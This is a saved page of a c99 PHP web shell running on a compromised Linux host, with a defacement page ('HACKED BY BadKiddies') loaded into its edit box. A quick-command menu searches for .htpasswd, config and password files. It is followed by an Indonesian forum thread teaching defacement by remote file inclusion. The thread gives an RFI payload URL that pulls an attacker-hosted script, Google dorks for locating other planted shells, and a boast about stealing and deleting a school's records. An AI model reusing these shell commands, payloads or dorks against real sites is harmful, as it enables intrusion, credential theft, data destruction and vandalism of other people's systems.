background-color: #800000;
font-size: 8pt;
color: #FFFFFF;
font-family: Century Schoolbook L;
border: 1 solid #666666;
}
button{
background-color: #000000;
font-size: 8pt;
color: #FFFFFF;
font-family:Century Schoolbook L;
border: 1 solid #666666;
}
select{
background-color: #000000;
font-size: 10pt;
color: #FFFFFF;
font-family:Century Schoolbook L;
border: 1 solid #666666;
}
option {
background-color: #000000;
font-size: 10pt;
color: #FFFFFF;
font-family:Century Schoolbook L;
border: 1 solid #666666;
}
iframe {
background-color: #800000;
font-size: 8pt;
color: #FFFFFF;
font-family: Century Schoolbook L;
border: 1 solid #666666;
}
p {
MARGIN-TOP: 0px;
MARGIN-BOTTOM: 0px;
LINE-HEIGHT: 150%
}
blockquote{
font-size: 8pt;
font-family: Courier, Fixed, Arial;
border : 8px solid #A9A9A9;
padding: 1em;
margin-top: 1em;
margin-bottom: 5em;
margin-right: 3em;
margin-left: 4em;
background-color: #B7B2B0;
}
body,td,th {
font-family: verdana;
color: #d9d9d9;
font-size: 11px;
}
body {
background-color: #000000;
}
</style>
</head>
<BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
<center>
<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0" >
<tr>
<th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2">
<pre><strong><font color="#00ffff"><center>
================================================== ===========================================</font>
__ __ ______ ____ _____ __ __ __ _______ __ __ ,,
| | | | | ___ \/ __ \ _____ / _ \| | | | | | '__ \| || |__ _____
[- -] | |__ \/ _| | ||_| / __ | | | | | | | |____ | | |__|| || | |/ __ |
| | __| __ \ |__ |\____\| || | | | | |___| | _ \| | \___ | | || |
| || | || | /\__| || || || || | |_| | || || | |_) | | | | | || |
\.__./|__||__||______/\____/|__||__|\_____/ \_______/|__|\___/|__| |__|__|__||__|
Production</font><font color="#00ffff">
================================================== ============================================</font></center></strong></pre>
</font><br>c99 shell versi th3sn0wbr4in (xixixixixixixi)
<br></center></th></tr><tr><td><p align="left">
<b>Software Server : Apache/2.0.59 (Unix). <a href="?act=phpinfo" target="_blank"><b><u>PHP/4.3.4</u></b></a></b>&nbsp;</p>
<p align="left"><b>System :&nbsp;Linux mars.webzdarma.cz 2.6.11-1.1369_FC4smp #1 SMP Thu Jun 2 23:08:39 EDT 2005 i686</b>&nbsp;</p>
<p align="left"><b>
</b>&nbsp;</p>
<p align="left"><b>Safe-mode : <font color=#ff0000>ON (secure)</font></b></p>
<p align="left">
<a href="?act=ls&d=%2F&sort=0a"><b>/</b></a><a href="?act=ls&d=%2F3w%2F&sort=0a"><b>3w/</b></a><a href="?act=ls&d=%2F3w%2Fczweb.org%2F&sort=0a"><b>czweb.org/</b></a><a href="?act=ls&d=%2F3w%2Fczweb.org%2Ff%2F&sort=0a"><b>f/</b></a><a href="?act=ls&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F&sort=0a"><b>fanlistings/</b></a>&nbsp;&nbsp;&nbsp;<b><font color=#00ff00>drwxrwxr-x</font></b><br><b>Free 504.48 GB of 1389.84 GB (36.3%)</b><br><a href="?"><img src="?act=img&img=home" alt="Home" height="20" width="20" border="0"></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="#" onclick="history.back(1)"><img src="?act=img&img=back" alt="Mundur" height="20" width="20" border="0"></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="#" onclick="history.go(1)"><img src="?act=img&img=forward" alt="Maju" height="20" width="20" border="0"></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="?act=ls&d=%2F3w%2Fczweb.org%2Ff&sort=0a"><img src="?act=img&img=up" alt="Parent Directory" height="20" width="20" border="0"></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href=""><img src="?act=img&img=refresh" alt="Refresh" height="20" width="17" border="0"></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="?act=search&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><img src="?act=img&img=search" alt="Search" height="20" width="20" border="0"></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="?act=fsbuff&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><img src="?act=img&img=buffer" alt="Buffer" height="20" width="20" border="0"></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="?act=encoder&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b>Encoder</b></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="?act=tools&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b>Tools</b></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="?act=processes&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b>Proses</b></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="?act=ftpquickbrute&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b>FTP brute</b></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="?act=security&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b>Sec.</b></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="?act=sql&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b>SQL</b></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="?act=eval&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b>PHP-code</b></a>&nbsp;&nbsp;&nbsp;&nbsp;</p></td></tr></table><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src="?act=img&img=ext_php" border="0">&nbsp;index.php (4.65 KB) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=#00ff00>-rw-r--r--</font></b><br>Select action/file-type:<br> <a href="?act=f&f=index.php&ft=info&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b><img src="?act=img&img=ext_diz" border="0"></b></a> (<a href="?act=f&f=index.php&ft=info&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) | <a href="?act=f&f=index.php&ft=html&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b><img src="?act=img&img=ext_html" border="0"></b></a> (<a href="?act=f&f=index.php&ft=html&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) | <a href="?act=f&f=index.php&ft=txt&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b><img src="?act=img&img=ext_txt" border="0"></b></a> (<a href="?act=f&f=index.php&ft=txt&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) | <a href="?act=f&f=index.php&ft=code&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><font color=#00ff00>Code</font></a> (<a href="?act=f&f=index.php&ft=code&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) | <a href="?act=f&f=index.php&ft=phpsess&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b>Session</b></a> (<a href="?act=f&f=index.php&ft=phpsess&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) | <a href="?act=f&f=index.php&ft=exe&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b><img src="?act=img&img=ext_exe" border="0"></b></a> (<a href="?act=f&f=index.php&ft=exe&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) | <a href="?act=f&f=index.php&ft=sdb&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b>SDB</b></a> (<a href="?act=f&f=index.php&ft=sdb&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) | <a href="?act=f&f=index.php&ft=img&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b><img src="?act=img&img=ext_gif" border="0"></b></a> (<a href="?act=f&f=index.php&ft=img&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) | <a href="?act=f&f=index.php&ft=ini&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b><img src="?act=img&img=ext_ini" border="0"></b></a> (<a href="?act=f&f=index.php&ft=ini&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) | <a href="?act=f&f=index.php&ft=download&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b><img src="?act=img&img=download" border="0"></b></a> (<a href="?act=f&f=index.php&ft=download&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) | <a href="?act=f&f=index.php&ft=notepad&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b><img src="?act=img&img=ext_rtf" border="0"></b></a> (<a href="?act=f&f=index.php&ft=notepad&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) | <a href="?act=f&f=index.php&ft=edit&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b><u><img src="?act=img&img=change" border="0"></u></b></a> (<a href="?act=f&f=index.php&ft=edit&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) |<hr size="1" noshade><b>Tersimpan!</b><form action="?act=f&f=index.php&ft=edit&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" method=POST><input type=submit name=submit value="Save">&nbsp;<input type="reset" value="Reset">&nbsp;<input type="button" onclick="location.href='?act=ls&d=/3w/czweb.org/f/fanlistings';" value="Back"><br><textarea name="edit_text" cols="122" rows="10">&lt;body bgcolor=black&gt;&lt;b&gt;&lt;br&gt;&lt;br&gt;&lt;center&gt;&lt;font face=verdana size=4pt color=red&gt;HACKED BY BadKiddies..&lt;br&gt;Ur Site Has been Defaced by BadKiddies..&lt;br&gt;&lt;br&gt;Fuck You Admin&lt;Br&gt;Nothing is Secure..&lt;br&gt;&lt;Br&gt;&lt;br&gt;&lt;br&gt;special thanks to th3sn0wbr4in&lt;br&gt;&lt;br&gt;&lt;br&gt;badkiddies@gmail.com&lt;br&gt;&lt;/b&gt;</textarea></form></td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="?act=cmd&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b>Menu Perintah</b></a> ::</b></p></td></tr>
<tr><td width="50%" height="1" valign="top"><center><b>:: Jalankan Perintah :: </b><form action="?"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="/3w/czweb.org/f/fanlistings/"><input type="text" name="cmd" size="50" value="" style="background-color:#000000"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value=":: Jalankan ::" style="background-color:#000000"></form></td><td width="50%" height="1" valign="top"><center><b>:: Perintah Instan :: </b><form action="?act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="/3w/czweb.org/f/fanlistings/"><select name="cmd" style="background-color:#000000"><option value="ls -lia" >Daftar Isi</option><option value="find / -name order.log -type f" >Cari order.log</option><option value="find / -type f -name *.mdb" >Cari *.mdb</option><option value="find / -type d -perm -777 -ls" >Cari semua Folder bermode 777</option><option value="find . -type d -perm -777 -ls" >Cari semua Folder bermode 777 di Directory skrg</option><option value="find / -perm -2 -ls" >Cari semua Folder &amp; File yang bisa ditulis</option><option value="find . -perm -2 -ls" >Cari semua Folder &amp; File yang bisa ditulis di Directory skrg</option><option value="find / -type f -name config.inc.php" >Cari File config.inc.php </option><option value="find / -type f -name &quot;config*&quot;" >Cari File config* </option><option value="find / -type f -name service.pwd" >Cari File service.pwd files</option><option value="find / -type f -name .htpasswd" >Cari semua File .htpasswd</option><option value="find . -type f -name .htpasswd" >Cari semua File .htpasswd di Directory skrg</option><option value="netstat -an | grep -i listen" >Lihat daftar Port yang terbuka</option></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value=":: Jalankan ::" style="background-color:#000000"></form></td></tr></TABLE>
<br>
<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
<tr>
<td width="50%" height="1" valign="top"><center><b>:: <a href="?act=search&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b> Cari </b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="/3w/czweb.org/f/fanlistings/"><input type="text" name="search_name" size="29" value="Ketik yang ingin Lo cari" style="background-color:#000000">&nbsp;<input type="checkbox" name="search_name_regexp" value="1" checked> - regexp&nbsp;<input type=submit name=submit value=":: Cari ::" style="background-color:#000000"></form></center></p></td>
<td width="50%" height="1" valign="top"><center><b>:: <a href="?act=upload&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b> Upload </b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile" style="background-color:#000000"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value=":: Upload ::" style="background-color:#000000"><br><font color=#00ff00>[ OK ]</font></form></center></td>
</tr>
</table>
<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Bikin Direktori Baru ::</b><form action="?"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="/3w/czweb.org/f/fanlistings/"><input type="text" name="mkdir" size="50" value="/3w/czweb.org/f/fanlistings/" style="background-color:#000000">&nbsp;<input type=submit value=":: Bikin ::" style="background-color:#000000"><br><font color=#00ff00>[ OK ]</font></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Bikin File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="/3w/czweb.org/f/fanlistings/"><input type="text" name="mkfile" size="50" value="/3w/czweb.org/f/fanlistings/" style="background-color:#000000"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value=":: Bikin ::" style="background-color:#000000"><br><font color=#00ff00>[ OK ]</font></form></center></td></tr></table>
<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Pindah Directory ::</b><form action="?"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="/3w/czweb.org/f/fanlistings/" style="background-color:#000000">&nbsp;<input type=submit value=":: Pindah ::" style="background-color:#000000"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Lihat File ::</b><form action="?"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="/3w/czweb.org/f/fanlistings/"><input type="text" name="f" size="50" value="/3w/czweb.org/f/fanlistings/" style="background-color:#000000">&nbsp;<input type=submit value=":: Lihat ::" style="background-color:#000000"></form></center></td></tr></table>
<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b><a href="?act=about"><u><center>Brought to you by</u></a><a href="http://th3sn0wbr4in.blogspot.com"> th3sn0wbr4in</center></a></b></p></td></tr></table>
</body></html>
..::Note::..
kl kalian mo pake php injection, at least kalian harus tahu perintah linux

tuch codenya... simpan dgn nama terserah kalian.. save as apa bad...
terserah juga.. .gif bs.. .jpeg bs juga.. .txt juga bisa... .cmd juga bisa

pokoknya terserah kalian dan simpan di domain kalian... kl gak pny bad ??? yh simpen di geocities aj juga gpp..

happy deface...

cacian, makian, badkiddies tunggu di forum ini
mantap....
jng tersinggung badkiddies namanya jg kounitas hacker... pada suka nyerang2 argumen semua XD

Klo gw Sich Nge Deface Ada tujuannya :-O Abis Di Nge Hack Web Org , Wa Ambil Data2x Nya / Apus2x in baru Dech gw deface /omg Pas Dah Dibetulin Hasil Defacenya , Si Yg Punya Web Melongoh /swt Mana Dokume Gw ye /?

Kek Waktu Di Skull Gw Dolo : Web Skull Gw Khan Ada Nilai Ulangan Yg Dipajang Di Situ , Gw Kesel Nilai gw Nggak Ada Yg Pernah Di tampilin di web /swt Lah , Ya Ud Gw Ambil Dokumen Pentingnya , Gw Delete , gw Deface Tulisannya Gini "Fuck U ! " /! Lgs Dech guru2x Pd Terkejut /omg gak ada yg tau , gw yg deface sampai saat ini /heh

gw tau kok/heh...

btw pertanyaan orang juice kog ga dijawab/?

Ehmm.. Tutor Nya Aneh Dech /omg Langkah2x Nya :-O Pasti Ada Yg Keliwat /omg Wah Kek Nya Ketawan Ngopy Dr tmpt Laen /swt

ha/omg
parah nih...
cupu/swt

Ehm.. Om Wa Mao Nanya . Tuh Script Khan Suruh Di Upload Di Web hosting Gratisan , Trus Wa Ada Tuh Account Di Geocitites (baru buat). Trus klo mau upload scriptnya di geocities gimana ya /?

geocities ga mendunkung php kan?harus diupload d webhosting yg dukung php.
nanti g carrin de y xd

tuch codenya... simpan dgn nama terserah kalian.. save as apa bad...
terserah juga.. .gif bs.. .jpeg bs juga.. .txt juga bisa... .cmd juga bisa

pokoknya terserah kalian dan simpan di domain kalian... kl gak pny bad ??? yh simpen di geocities aj juga gpp..
Pasti Mao Ngikutin Ini Ye /? Dah gw Bilang , Tutor Nya Ngaco :-O Mungkin Ada Yg Di Ilangin Atau Lupa Di Copy Paste :-/

woi
www.sugarplumb.com koq ga bisa shell.php nya/?
gimana tuh cara ngedeface kaya gitu??

La...Wakakkak /heh Khan File ****.php (Bkn Shell) Nya Dah Di Apus Ma Gw /heh Jd Pas Lu Di Index , Jd Root ya /?

KK Itlust , Mang Bener Bkn Tuh Tutorial Nya Gak Bener / Ada Yg Ilang (Keliwat) /?

Thread Starter Nya Mana Nich /? Koq Kabur /swt Pengecut Nich /swt

aaadduhhhhhh... gini lhow.. untuk buat php injection gak harus disimpen .php
geocities mmg gak support php.. tapi kode yg badkiddies berikan bs di simpen sebagai .txt, .jpeg, .cmd, .gif JADI GAK HARUS .PHP
jadi disimpen di geocities kalian sebagai .apaaja gak harus .php
nah untuk mencari korban bs dilihat di milw0rm - exploits : vulnerabilities : videos : papers : shellcode (http://www.milw0rm.com)

hxxp://www.geocities.com/badkiddies_2006/tembak.txt (ganti x dgn t)
(tuch contoh php injection... walaupun .txt, tapi kl kalian klik view (use IE) pasti keluar HTML) copy- paste tuch code...

hxxp://www.geocities.com/badkiddies_2006/injeksion.txt (ganti X dgn )
(itu kode juga...)

jadi gak harus .php !!!!!!!!!!!!!!


ini contoh dari milworm.com
MyAlbum <= 3.02 (language.inc.php) Remote File Inclusion Vulnerability (http://www.milw0rm.com/exploits/2747)

google dork : "./language.inc.php"
http://sitename.com/[MyAlbum_DIR]/language.inc.php?langs_dir=http://evilsite.com/evilscript.txt?

jadi begini :
http://www.korban.com/com[MyAlbum_DIR]/language.inc.php?langs_dir=http://gecoties/badkiddies_2006/tembak.txt?

..::Note::..
pada dasarnya kalian terlalu manja.. minta disuapin terus.... malas berexplorasi
badkiddies gak bisa selalu online :
1. badkiddies anak orang gak mampu, jadi gak bs online di warnet terus
2. badkiddies bukan pengangguran jadi msh bnyk yg badkiddies lakukan

gw ngaku memang gw suka di suapin..
cara nyarinya di milw0rm gimana?

gw ngaku memang gw suka di suapin..
cara nyarinya di milw0rm gimana?

Ilangin dolo tuh kebiasaan jadi Leecher... :> :>

nanya serius juga..

udah2x jagan pada ribut /! gw kesel neeh sana - sini pada ribut :angry: Udah deh yg lbh tahu / pintar mending jgn pelit2x /heh bagi2x donk ilmunya /heh

Lamer Makan Leecher /swt

http://www.korban.com/com[MyAlbum_DIR]/language.inc.php?langs_dir=http://gecoties/badkiddies_2006/tembak.txt?
[MyAlbum_DIR]
Ini Maksudnya Apa Kk /?

nah untuk mencari korban bs dilihat di milw0rm -
Khan ada banyak menu nya /? pilih yg mana /?

Coba Dech Tunjukkin Step By Step Nya yg lengkap , step by step deface web phdcourse.net /no1

nih hasilnya:
http://www.phdcourse.net:8080/login.php

Bingung, apaan yach

Aku bingung nih... ini bukannya nama tekniknya RFI (Remote File Inclusion) kok jadi PHP Injection...

http://www.korban.com/com[MyAlbum_DIR]/language.inc.php?langs_dir=http://gecoties/badkiddies_2006/tembak.txt?

Ini Maksudnya Apa Kk /?


Khan ada banyak menu nya /? pilih yg mana /?

Coba Dech Tunjukkin Step By Step Nya yg lengkap , step by step deface web phdcourse.net
Cari-cari aja sendiri... trus di google dah
Ngapain Deface Klo Gak Ada Untungnya Mang DefaaceBikin Bs Jd Terkenal , Mang Sich Jalur Gw Bkn Di Hacking, But Masuk Ke Sistem Org Lewat Deface Wkkkk...B'Canda Ya Trus , Kek Nya Gw Pernah Liat Article Nya, Tapi Di Mana Yach N Once Again , Defacing Itu Menurut Gw Gak Jaman , Klo Gw Sih Maennya Back Door

Oh Iya , BadkiddiesNih Thread Gw Bantuin Yach Biar Pd Ngerti Semua /!



Google Hacking (http://www.indoforum.org/guide-tutorial/tips-mengoptimal-kan-google-buat-hacking-8027/) Ada Di Bagian Tutorial


Once Again, TBC (Turut Berduka Cita )
Bisa terkenal kok...
Wkkk... Bs Jd Tenar Klo Th0r Ngedenger Ini Bs Keseleg Nich Eh... Klo Lu Hacker Mustinya Tau Donk , Deface Ama Hack Itu Apa Deface Itu Langkah Awal Sesuda Hacking Misalnya : Lu Abis Ambil Data2x Penting N Secure Di Suatu Web , Abis Lu Ambil Baru Lu Deface /no1 Klo Di Deface Nggak Di Hacking Mah , Ngapain /? Kurang Kerjaan /!

Lagian Trick Lu Aneh /? Lu Nyolong Dr Mn Trick Ini /?

Gw Binggung Nich Disitu Khan Ada Siapkan Shell / PHP Injection N Siapkan Html Bautan Qta Abis Itu Cari Target /omg N Serang Make HTML Buatan QTa /heh La.. Trus Mana Langkah Nge Inject PHP Nya /? Mana Langkah Buat Masukin Kode2x PHP Nya /? Disitu Cm Ada Perintah "Siapka PHP Injection N Siapkan HTML" Abis Itu Ke Web Sasaran , Trus "/shell.php , terus Haxplorer , terus HTML Nya Gunain , Terus Save /!

Kmaren gw PM Si D-Cracker , Liat Tuh Siggy nya /! Dia Nge Deface Make PHP injection /! Kt Dia , Dia Nggak butuh Kode2x Tsb , Dia Lgs Melkaukan Aza /! Misalnya Web Nya Ini : xxx/shell.php
Nah Dia Lgs Aza tulis di address bar /shell.php , joq Bisa ya /? Pd Hal Khan Harus Nya Make Kode2x PHP Injection Dolo /?

Itu namanya phpshell. Kau bisa mencari yang lain di Internet. Di yogyafree udah ada orang kurang kerjaan ngerampung shell itu ke satu zip dan rar. Cari aja. Ato kalo mau nyari sendiri nyari aja di Google.

Neh dorknya:
inurl:c99
inurl:c99.php
inurl:r57
inurl:r57.php
DxShell

Aku juga punya koleksi siap pakainya. Mau? :)

lagi bahas php ama deface an yah wah sory saya wong bodo kagak ngerti yg beginian

hmmm kayanya ada bagian yg ilang ya

btw. php sheel ama php injection beda ya (rfi biasanya di pake untuk looking awal buat injection php jadi bisa juga seh dimasukan dalam step php injection)

php code its manual trick simple trick make a shell
btw lagi: dork nya kagal salah bro